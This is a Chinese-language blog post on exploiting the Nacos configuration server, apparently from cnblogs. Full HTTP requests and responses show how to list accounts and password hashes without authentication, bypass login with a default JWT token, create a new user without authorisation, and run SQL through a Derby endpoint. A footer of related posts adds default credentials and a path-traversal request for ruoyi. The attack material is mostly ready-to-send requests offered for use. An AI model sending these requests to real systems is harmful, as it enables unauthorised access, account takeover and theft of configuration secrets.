首页 > 其他分享 >nacos漏洞利用

nacos漏洞利用

时间:2024-07-02 16:11:48浏览次数:1  
标签:application HTTP 1.1 利用 nacos 漏洞 xx zh

nacos概述

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

简单来说nacos就是阿里开发的一个中间件,它主要提供三种功能:持久化节点注册,非持久化节点注册和配置管理。

他里面包含大量的配置信息,因此对他的漏洞利用往往能带来意想不到的效果。

漏洞描述

未授权查看账号信息

影响版本:0.1.0 <= Nacos <= 2.2.0

最简单的可以直接通过访问/nacos/v1/auth/users?pageNo=1&pageSize=900,可以查看nacos的账号信息

request

GET /nacos/v1/auth/users?pageNo=1&pageSize=10 HTTP/1.1
Host: xx.xx.xx.xx:xx
User-Agent: user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

response

HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 159

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}

这段hash值,是nacos的默认密码nacos的hash值,我们获取之后可以直接去比对,若是这个值,就是默认密码。

还有稍微麻烦一点的是,他加了验证机制,使用的jwt去验证的,不过还是存在很多系统使用的默认accesstoken:eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ

这种的话也不难,添加一个参数就行

request

GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9
HTTP/1.1
Host: xx.xx.xx.xx:xx
User-Agent: user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

response

HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 159

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}

同样的看这个hash是否为默认密码。

添加用户

是一个越权添加用户的操作,操作简单。

request

POST /nacos/v1/auth/users HTTP/1.1
Host: xx.xx.xx.xx:xx
User-Agent: user
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 27

username=nilf&password=nilf

response

HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 52

{"code":200,"message":"create user ok!","data":null}

SQL注入

payload4:

nacos/v1/cs/ops/derby?sql=select * from config_info

标签:application,HTTP,1.1,利用,nacos,漏洞,xx,zh
From: https://www.cnblogs.com/nilf/p/18280025

相关文章

  • ruoyi漏洞利用
    1、ruoyi默认口令admin/admin123ruoyi/1234562、前端shiro反序列化版本过低,基本不能利用,使用反序列化工具不再过多介绍。3、任意文件读取Ruoyi<4.5.1GET/common/download/resource?resource=/profile/../../../../../../../{filename}4、SQL注入4-1、/system/role/l......
  • 怎么彻底关闭Nacos?解决启动时Spring连接Nacos报错
    NacosNacos是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。它是阿里巴巴开源的一个项目,旨在帮助您发现、配置和管理微服务。Nacos提供了一系列丰富的特性集合,支持服务发现和服务健康监测、动态配置服务、服务元数据和流量管理等功能。主要功能服务......
  • 利用爬虫批量下载小说内容
    #此文章仅供学习参考#http://book.zongheng.com/#https://www.zongheng.com/books?worksTypes=6104大类链接#https://read.zongheng.com/chapter/1215587/68240827.html第一章链接<liclass="vipcol-4"><ahref="https://book.zongheng.com/......
  • CentOS 7基于开源项目制作openssh9.8p1 rpm二进制包修复安全漏洞CVE-2024-6387 ——
    2024年7月1日,官方发布openssh9.8版本,修复了安全漏洞CVE-2024-6387。此处主要基于开源项目https://github.com/boypt/openssh-rpms.git制作,之前也有写过类似的文章,这里就不再赘述。CentOS5/6/7基于开源项目制作openssh9.6p1rpm包——筑梦之路_centos6openssh9.6rpm-CSD......
  • TypeScript中,如何利用数组生成一个联合类型
    本文由ChatMoney团队出品在开发中我们常常会遇到这样一个问题,代码如下:constarr=["a","b","c","d","e","f","g","h","i","j","k","l&qu......
  • TypeScript中,如何利用数组生成一个联合类型
    本文由ChatMoney团队出品在开发中我们常常会遇到这样一个问题,代码如下:constarr=["a","b","c","d","e","f","g","h","i","j","k","l&qu......
  • 详解Web应用安全系列(5)敏感数据泄露漏洞
    在最近几年,这是最常见的,最具影响力的攻击。这个领域最常见的漏洞是不对敏感数据进行加密。在数据加密过程中,常见的问题是不安全的密钥生成和管理以及使用弱密码算法,弱协议和弱密码。特别是使用弱的哈希算法来保护密码。在服务端,检测数据传输过程中的数据弱点很容易,但检测存储数据......
  • MyBatis-利用切面实现公有字段自动填充(非MyBatisPlus方式)
    需求:在MyBatis框架中,如何对createBy,createTime,updateBy等这些公有字段实现自动填充呢?网上搜了很多,实现的方案全是采用集成MyBatisPlus,利用其封装好的方法来实现的。。。。。数据准备:1、准备一张数据库表CREATETABLE`user`(`id`varchar(36)NOTNULL,`username`......
  • 一款利用人工智能将自然语言查询转换为 SQL 代码的互译工具 - SQL Translator
    https://www.sqltranslate.app/ 一款利用人工智能将自然语言查询转换为SQL代码的互译工具-SQLTranslator 思维导航前言SQLTranslator介绍工具特性本地项目部署在线效果演示程序员常用的工具软件前言对于后端程序员来说,编写SQL代码是日常工作中不可或缺......
  • windows 和 ubuntu双系统利用iperf3 测试网络带宽
    本文介绍如何利用iperf3就行windows和ubuntu的带宽测试。本文的写作原因是在进行webrtc通信时发现带宽利用率极低,只有20M左右,而我设置的动态瓶颈带宽最低都有80M。一开始是想利用tcp连接不停发送数据来利用nload查看网络吞吐量观察带宽变化。实现之后发现因为每次写入的数据太小......